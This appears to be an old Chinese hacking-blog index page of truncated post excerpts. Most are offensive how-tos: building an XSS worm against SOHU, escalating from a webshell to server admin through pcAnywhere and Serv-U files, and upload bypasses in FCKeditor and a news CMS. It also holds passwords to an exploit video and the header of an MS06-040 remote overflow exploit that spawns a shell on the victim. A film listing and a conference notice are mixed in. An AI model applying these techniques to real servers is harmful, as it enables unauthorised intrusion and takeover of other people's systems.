您正在查看 "默认分类" 分类下的文章
2006年08月24日 星期四 下午 03:15
文章作者:茄子宝 原始连接: http://www.eviloctal.com/ 首先我已经在 《XSS worm初尝试》 http://forum.eviloctal.com/read-htm-tid-24263-page-e.html 这个帖子里详细说明了SOHU这个XSS漏洞.这个漏洞要写出XSS worm有两个限制: 1.XSS代码长度限制,不能超过2000字符。 分析:写成JAVACRIPT后需转HTML编码十进制,一小段便超过2000字符了。 2.“域权限”限制。 分析:XSS worm的POST数据相关代码不能从站外调用,通俗点讲就是不能站外提交数据,包括调用外部JS用document.write方法,所以只能把POST数据的代码全部写到XSS里。 从正常的脚本代码上估计是没什么方法了,只有靠浏览器的漏洞,突破以上两点的思路: 1.直接用XSS代码写一个框架网页. javascript:for(i=0;i<document.images.length;i++){if(document.images.src.indexOf('j')==0)document. |
2006年08月24日 星期四 下午 02:41
在aspx后缀文件前面加个~(波浪线)可以暴出物理路径 |
2006年08月23日 星期三 下午 10:30
導演:吳宗憲
演員:吳宗憲、林立雯、NoNo、蔡頭、馬國畢
影片大綱: 『吳宗憲』自導自演最新力作。『吳式』搞笑風格 |
2006年08月22日 星期二 下午 11:39
享有中国的blackhat会议美誉的焦点峰会(xcon)于8月22日在北京会议中心召开,计划于24日落幕.今年是安全焦点(http://www.xfocus.net)举办的第五届焦点峰会.聚集了绝大多数中国的顶尖黑客和一部分国外的顶尖黑客高手.参会人数达到七八百之多.
信息安全技术的领军人物与世界各国的发烧友们一起分享研究硕果和独到经验,与会的演讲者是最优秀,最具才华的人士.这些经验丰富的专业安全人员,同时也是信息安全技术方面的佼佼者,他们将在这次会议上展示独一无二的新的技术资料.
XCon2006以"人文中国,专业XCon"为主题,为演讲者和参会者提供一个技术和人文交流的平台.为期三天,围绕十四个主题,焦点峰会将在轻松惬意的环境下举行,会议为从事信息安全领域的专家、技术人员、安全管理者、管理人员,黑客技术爱好者提供一个相互学习和交流的国际性平台,他们畅所欲言,尽情展现自己.这不仅是一次精彩的讨论会,更重要的,它是一个 "party"--分享成功喜悦的 "party".
附:演讲者及议题
Adrian Marinescu
Windows Vista堆管理加强 – 安全,可靠性,性能
CoolQ & 罗宇翔 & 孟策
利 |
2006年08月22日 星期二 下午 06:20
话说到花了九牛二虎的力气获得了一个webshell,
当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~
嘻嘻~~好跟我来,看看有什么可以利用的来提升权限
****************************************************************************
第一
如果服务器上有装了pcanywhere服务端,管理员为了管理方便
也给了我们方便,到系统盘的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地
破解就使用pcanywhere连接就ok了
****************************************************************************
第二
有很多小黑问我这么把webshell的iis user权限提升
一般服务器的管理都是本机设计完毕然后上传到空间里,那么就会用到ftp,服务
器使用最多的就是servu
那么我们就利用servu来提升权限
通过servu提升权限需要servu安装目录可写~
好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载
下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖,
启 |
2006年08月22日 星期二 下午 06:19
通杀新云系统2.1以前的版本.已经按照朋友们的意愿做成动画教程. 当时发现的时候不便放出来,这会已经过去了几天了. 我就把利用的教程做出来了 思路得益于我的朋友们,也在这里谢谢他们 动画教程下载地址 http://www.secow.com/down/newasp.rar 由于漏洞涉及面较广.我对压缩文件和教程进行了加密. 如果有人很需要 rar压缩包的:cnlnfjhh 录象的: cnqun |
2006年08月22日 星期二 下午 02:30
创建时间:2004-05-29 更新时间:2004-05-30 文章属性:原创 文章提交: haixiao (hardpin100_at_yahoo.com.cn) 近来大家为dvbbs的文件上传漏洞兴奋不已,想想在其他的系统里面能不能用的上呢?我就以惠信新闻系统来抛砖引玉吧! 惠信新闻系统3.1 windows2000+sp4 先看这句代码。admin_uploadfilesave.asp ............... Server.mappath(formPath&file.FileName) ............................ 保存时用路径+文件名+后缀名,那我们可以用dvbbs上的漏洞了,只不过我们改的是文件名(因为系统有固定的路径 ,改路径的话,上传不会成功) 这是我捕获的数据: POST /admin_uploadfilesave.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Referer: http://127.0.0.1/admin_uploadfile.aspAccept-Language: zh-cn Content-Type: multipart/form-data; boundary=------------ |
2006年08月21日 星期一 下午 02:30
文章作者:9xiao[F.S.T]
Fck_editor的漏洞利用
fck_editor应用在nb文章系统的上传工具。
editor/fck_editor/editor/filemanager/browser/default/browser.html?type=/&connector=connectors/asp/connector.asp
editor/fck_editor/editor/filemanager/browser/default/browser.html?type=/&connector=connectors/php/connector.php
,昨天测试官方站的时候发现漏洞一样存在,今天看的时候好象补了。漏洞修补好象是传asp等后缀名的时候,生成的是nba的后缀。上传原来很简单在后缀加个空格就可以了。 还有一种利用就是建立个9xiao.asp的文件夹,传个修改了后缀为jpg或gif的aspshell。:)需要是win2003系统。
by 9xiao
|
2006年08月20日 星期日 上午 11:44
前几天还刚刚看到搜索论坛中流传的一个帖子--讨论搜索引擎不能搜索到的内容,如文档、内部网、收费运营的数据库等等,在爱问上转悠的时候,居然发现一个针对收费数据库内容的检索服务 --专业搜索 (zhuanye.iask.com),本人随意查询了一个关键词“啤酒花”,虽然搜索结果只有139条,但查出不少关于如何压缩啤酒花,检查啤酒花成分的内容;出于好奇,仔细查看了一下内容的渠道来源-居然都来自网上比较少见的“收费数据库”,比如标准数据库、专利数据库.
如果要看全文内容,是要交一个阅读费用的,看了一下,倒是不贵,通常在1元以下一篇内容,少数报告类的内容在 50元左右,对内容收费服务超星数字图书馆、中国知网等数图类服务商已经实现多年,不过向爱问专业搜索这样面对网民的付费搜索和查阅服务,我这看到的还是第一家,不知这样的收费方式是不是会被网民所认可.
看得出,爱问对自己新推出的服务也不是很有底,才会联合号称百家专业网站推出有奖调查活动,应该是希望针对那些有需求使用专业收费数据库的网民,了解消费倾向吧,不过笔者个人倒觉得这是一个有意的尝试,但还须等待用户的考验.
中国的互联网需要有不断创新的服务和产品,但要真正让网民接受一个新的服务形态,恐怕 |
2006年08月20日 星期日 上午 07:27
/*
Microsoft Windows CanonicalizePathName() Remote Overflow MSO6-040
More info: http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx
Written by Preddy
This is another version of hdm's metasploit version but ported to C,
Works against Windows XP SP1
And it should give a crash on Win2k in services.exe
On successfull exploitation it provides a remote shell at port 54321
of your victim:
./ms06 192.168.1.103
Target: 192.168.1.103
Attack Finished: now open a new terminal and nc to your victim on port 54321
Warning: Don't close this window!
[open a new terminal/window/prompt]
nc 192.168.1.103 54321
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
http://www.team-rootshell.com
Greetz to all of my friends at:
FREENODE(irc.freenode.net): ##c,##linux,##php,##security,##slackware,#fluxbox,#perl,#remote-exploit,#tor |
|
| |
